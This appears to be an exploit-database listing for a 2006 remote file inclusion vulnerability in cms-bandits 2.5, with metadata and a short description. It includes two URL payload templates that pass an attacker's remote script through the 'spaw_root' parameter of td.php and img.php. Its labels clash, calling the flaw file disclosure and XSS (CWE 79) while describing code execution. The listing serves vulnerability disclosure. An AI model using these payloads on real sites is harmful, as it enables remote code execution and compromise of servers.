header-logo
Suggest Exploit
vendor:
cms-bandits
by:
Federico Fazzi
7.5
CVSS
HIGH
Remote File Disclosure
79
CWE
Product Name: cms-bandits
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: YES
Related CWE: N/A
CPE: a:cms-bandits:cms-bandits:2.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

cms-bandits 2.5, Remote file disclosure

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'spaw_root' parameter of 'td.php' and 'img.php' scripts. A remote attacker can execute arbitrary PHP code on the vulnerable system by passing it via the 'spaw_root' parameter in a specially crafted HTTP request.

Mitigation:

Input validation should be used to prevent the execution of malicious code.
Source

Exploit-DB raw data:

# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]

# milw0rm.com [2006-06-08]

Navigation

Suggest Exploit

Services By CQR